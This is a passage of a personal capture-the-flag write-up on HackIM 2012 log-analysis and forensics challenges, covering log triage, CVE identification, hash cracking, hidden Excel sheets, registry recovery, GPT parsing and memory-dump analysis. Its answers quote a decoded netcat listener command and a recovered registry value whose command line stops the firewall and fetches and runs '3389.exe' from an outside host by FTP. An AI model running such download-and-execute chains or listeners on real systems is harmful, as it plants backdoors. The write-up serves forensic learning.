  • 26. Log Analysis 3: Clever IntruderOfficial Hint: N/APage Source :<!-- md5sum: 396df3308184a77890cb708f05915f29 -->Description: access.rarAnalysis: A 25MB log with approx 1 lakh lines. Seemed nearly impossible to analyze it, sothought for a while and looked around google for some good log explorer so as to make taskeasier, got few but they were all useless, I wasted my time, came back to my old favoriteUltraedit and gave a quick glance through the lines. Learnt from the logs that: - Logs were generated from different scanners. - There was variation in IP. - Scanning was performed on same date between fixed period of uninterrupted time. - The HTTP Status Code for most of the request was 404.Hence the last finding proved to be essential. Assuming we couldn’t find anything interestingfrom a “Page Not Found” error. I tried my level best to separate all those logs to different tabs inultraedit.This was really a very hectic job, had I got some more knowledge wouldn’t be tough toget past this hurdle easily. This level really made me realize how poor I m.After a long hours ofassumed work, eventually came across the line with an encoded base64 string“bmMgLWwgLXAgNjY2Ng==” and on decoding got “nc -l -p 6666”. On the original log, thiswas on line number 37409 (Ultraedit).Flag:
  • 27. Log Analysis 4:Official Hint: Exploited!!!Page Source :<!-- md5sum: afcc45de48c327847c507c68ad7e6bf4 Expected Format: CVE-XXXX-XXXX -->Description: CVE of the Exploit is the FlagAnalysis: This challenge was all about finding a CVE exhibited by the content in the log.As mentioned it was a burp suite log. To make the view easier, I renamed the log file intolog.xml and opened it in web browser. Again this log had many 404 Not Found Requests.Aftergoing through first few lines, came across the logs of Tikiwiki, there was other logs of joomla,but I preferred to go sequentially. Since I m not good with exploit identification. I browsed tohttp://nvd.nist.gov/ and searched CVE for tikiwiki. Most of the result returned CVE related toXSS but in our log I couldn’t see any such XSS thing, so went with exceptions, and eventuallygot the flag. Honestly I couldn’t understand which line in the log referred to the CVE, but I hadan answer for the question.Flag: CVE-2005-1921Log Analysis 5: Waat Laga ServerOfficial Hint:Page Source :<! -- md5sum: c641fa00c0a84fd8fd954b3e75d5d6c8 -->Description: dump.rarAnalysis: Again 95 MB of logs, loaded it into wireshark and tried for few minutes to look into it,looked at first few lines and last few lines, honestly didn’t understood, as it was really difficult tobrowse through each lines one by one. Tried to find some alternate way and couldn’t learn muchall I got was some bogus ads for shareware log explorers asking for $$$.Came back todescription again and noticed that for 3rd flag name was required. Googled for the string “LocalPrivilege Escalation Exploit” and the search resulted some exploit-db papers. The interestingthing I noticed that was CVE that may help me with author identification. Next challenge was tolook for CVE in such a huge log, used cat command but that didn’t help, again tried with fewmore of them but there was no result, eventually ended up with the string command to get theCVE;
  • 28. Also found the paper at http://www.exploit-db.com/exploits/9479/ .Finally got my first flag forthe challenge: Tavis Ormandy Julien Tinnes. I studied the exploit and came to understand fromthe title that it was local root exploit.Now expectations were high with strings command and I extracted all the strings from the dumpto a plain text file.The command I used was: strings dump.pcapng > dump.txtBy this time I had a stripped version of the log with with more important things.Next I tried to look for the last flag that was for the root password. Since it was a local rootexploit. I looked for the pattern root inside dump.txt and got the hash for the root.Next I used JohnTheRipper to crack the hash and got my 2nd flag as : zuzanaOnto the hunt for 3rd flag, it asked to look for the vulnerable parameter.Opened dump.txt and sawthat there were many 404 , so again it was time to eliminate those and consider the successfulresponses.i tried with few variations and again stripped down dump.txt to ok.txt now we hadmuch smaller information to analyze.Went through the file ok.txt and observed and got to noticed that the parameters page, title and idwas common with the entire GET request. Hence with variation of parameters, I got the flagsuccessfully, I had to spend too much time with all those iterations and variations, indeed it wasone of the level on which I had spent much more time to analyze to get the flag.Flag:
  • 29. ===================================================================== Forensics LevelsForensics Level 1: Tum Agar Dhyan Se Baat Meri SunoOfficial Hint:Page Source:<!-- md5sum: 1478ae7166bf5ab5d4f4a4136b819319 -->Description:While conducting the raid on a suspect the police found the system containing nosuspicious information in the form of a code. While comparing various files they came up with asuspicious sound file and feel that the code is hidden inside the same.You are asked to find outthat code if hidden in the file.Analysis: This was one of the coolest challenge in the HackIM 2012 CTF. I listened to the audioand observed that there was distortion at certain places and also heard that the distortionappeared on single channel. I had earlier used audio editor software “GoldWave”. I opened thataudio in GoldWave and separated those distortions from the main stream, since the distortionwas on single channel (right) the task became easier. After listening to the distortion it didn’tgave up any meaning, and thought of applying some sound effect, on the very first attemptapplying the reverse sound effect I got the flag.Flag: 12344346765Forensics Level 2: Andar Ch0rOfficial Hint: A night with MS OfficePage Source :<!-- md5sum: 74a967082a6c79757cf56cb29f70e8d9 -->Description: company Mil Baat Ke Khao Ltd suspects that one of its employees is sending theinternal codes secretly outside the organization. The company sniffed the data being sent andreconstructed it to find that a word document was being sent. The company strongly suspects thatthere is some hidden passport code in the document. You as a forensic investigator are providedwith the copy of that file and are required to find out the hidden code. The code has to be inwhole number.Analysis: This challenge was full of twist, I enjoyed solving it. I opened the given worddocument and saw some numeric digits; it was some hex values, I converted them into ASCIIand was made fool. After a while I doubt about the file and tried to confirm it using TrID :http://mark0.net/onlinetrid.aspx, The result showed up with possibility of the file being an exceldocument. I renamed the file into flag.xls and opened it in excel. Cool I was on right path, now Ihad no idea of what to do.Next I opened the file in notepad and went through the lines,
  • 30. somewhere near the end I saw some plain text “Hey Good Job done…..” and just below therewas “Sheet1” and “Sheet2” but I couldn’t remember figuring any Sheet2 in flag.xls. So got anidea that it was hidden. It had been ages since I had worked on any excel sheet so really hadforgotten how to hide excel sheets. Google, and got a link:http://www.howtogeek.com/howto/14160/hide-and-unhide-worksheets-and-workbooks-in-excel-2007-2010/So now sheet2 was visible, but still I was far away from my flag.Again followed up the linkwhere it had asked to use VB Editor to unhide the supper hidden worksheet.(ALT+F11).Saved it, and finally Sheet3 was revealed with the flag in it.Flag: 6924289
  • 31. Forensics Level 3: Not Guilty!Official Hint:Page Source :<!-- md5sum: 66666e32a8296f3073619c1dea43d9bf -->Description: An employee was suspected of using some malicious files. The employee assertsthat he is not guilty because he never used any program except Microsoft word and excel. Whileconducting the analysis nothing was found in the registry suggesting that something did runautomatically. All locations that can run program automatically were examined and nothingmalicious was found. You as an investigator are provided with a piece of hive to carve out ifanything was deleted from the hive and provide the exact "Value", "value type" and "data"deleted so that the employee gets the justice.Analysis: This level was all about registry recovery. I had never encountered such incident andto understand it went through several forensics articles of registry recovery. Initially I downloada windows binary of a tool called Yet Another Registry Utility (YARU). Played with it for sometime and realized that it wouldn’t help me to come somewhere around the flag. Quit and wentthrough few more manuals. Eventually came across a tool called as “reglookup-recover”. It wasan open source, installed on ubuntu and went through the instructions. After this it wasn’t muchtough to get the flag.Came back to description and cross checked the values obtained with the result, ending upsolving this level.Flag:Value:ShellValue Type:REG_SZData:c:windowssystem32cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org>cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&delcmd.txt /q
  • 32. Forensics Level 4: Intriguing MBROfficial Hint: Sometimes things spill overPage Source: <!-- <form id="flevel-4" name="flevel-4" method="post" action="flevel-4-proc.asp" onsubmit="return validate_form(this);"> -->Description: A suspected drive was found in bad shape. The data extraction was almostimpossible and the final copy obtained carried only few bytes. The bytes belonged to the initialsectors and wherever the system could not read the space was filled with 0x00 so as to keep theoffset of the data obtained intact. The initial sector displayed a messy MBR data.As a forensic investigator you are required to find the following information:1) The number of partitions in the damaged drives2) The start and end LBA for each partition3) The Start and end of unpartitioned space between two clustersThe Drive showed to be a SATA drive with 512 bytes of LBAAnalysis: Yet another level that kept me away from doing anything. Merely a 20KB file but mayrequire 20 hours to understand it for a newbie like me. Started with the google on partitionforensics and ended up with GUID partition table on wikipedia, a long story probably wouldspeak about it sometime later (Evil Mind).So the first thing that we required for this challenge was some boot record parsers. I got one athttp://www.garykessler.net/software/index.html. The package contained 5 Perl scripts, extractedit to a folder. 1. I parsed a GUID Partition Table (GPT) header file image.dd using GPTparser.pl
  • 33. Result of parsing: 2. Coming back to wikipedia, there was a header format for LBA1: 3. So comparing the offset 072-079 from image.dd with the one on the table below, we can conclude that there are 9 partitions,( 2 primary copies as mentioned, and 7 between 72- 79)
  • 34. 4. Also it had been mentioned in the description that the LBA size was 512 bytes. And in our image.dd we can observe from the result of parsing that the partition table is starting from the offset 80. Hence the next LBA will be at (512+80)=5925. Now it was time for some hex editing, I opened image.dd and traversed to position 592(250h). Since we had concluded in our earlier steps that there were 9 partitions. We had to edit the location from 00 to 096. Now again we had to parse the modified image.dd.7. As in Step1 and we got all our 9 partitions.8. Now next step was to observer the GUID from the result and match it with the table given on wikipedia to find out the partition type.
  • 35. 9. Finally the LBA thus obtained was not arranged accordingly and we had to arrange it inascending order so as to obtain the flag.Flag:Forensics Level 5: Universal Swindlers BayonetOfficial Hint:Page Source :<!-- Format Expected: "DD/MM/YYYY HH:MM:SS" -->Description: Anusandhaanic Daakus Ltd. Is a company whose strength lies in the researches itconducts? Very often the employees leaving the organisation manage to carry the research dataalongwith. This time company decided to go for the investigation and called upon a forensicinvestigator. This investigator captured the memory dump and shut the system down. Onresuming the system he finds that the drive has been encrypted and is left with only the memorydump.You as an investigator are required to find out the following information from the dump1) Serial No. of external drive2) Date and time (IST) when the drive was first connected3) Date and time (IST) when the drive was last connected4) Launching which other executable (Not nullcon.exe>) resulted in launching of nullcon.exeAnalysis: This level was all about memory dump investigation.As usual had to lookup in googleto find some memory dump analysis tool. Came across Memoryze and Audit Viewer.I installed itand fired up Audit Viewer to analyze the dump. The GUI was easy to understand and had awizard which I followed up accordingly. After a while I got the results in a simple formattedway. I tried going through the windows but couldn’t find anything much relevant and ended upgetting only the last flag.
  • 36. Again went through the various links and came across a tool named volatility. Installed it andplayed with it for a while.With the following working steps I got the rest flags: 1. I tried to locate the registry hive where we could find the external drive information. 2. The second last registry hive was supposed to store all the drive information. 3. I dumped the second last hive and got a very long list of registry information. 4. The challenge was to look for the external drive information I went through few analysis articles and found that USBSTOR key stores the external USB drive information. 5. Hence ended up with the following command and got the result successfully.
  • 37. 6. But still the flag was not yet completed the page source revealed that the expect time must be in IST hence we had to add +5:30 to the time when drive was first connected and last disconnected.Flag:Finally Near The End, Few Words: - All the links and tools mentioned above were functioning during this write-up and I cannot assume it to be working throughout. - I apologize for any grammatical mistakes or with my poor English. - The ideas mentioned above are my own and may differ from yours. - I completely agree with the fact that there can be much better way to solve the above challenges but eventually mine ideas worked out. - Wish Happy Hacking to Everyone. - End, Regards To All The Members of NULL.The epic story ends here….. ~$-THE END-$~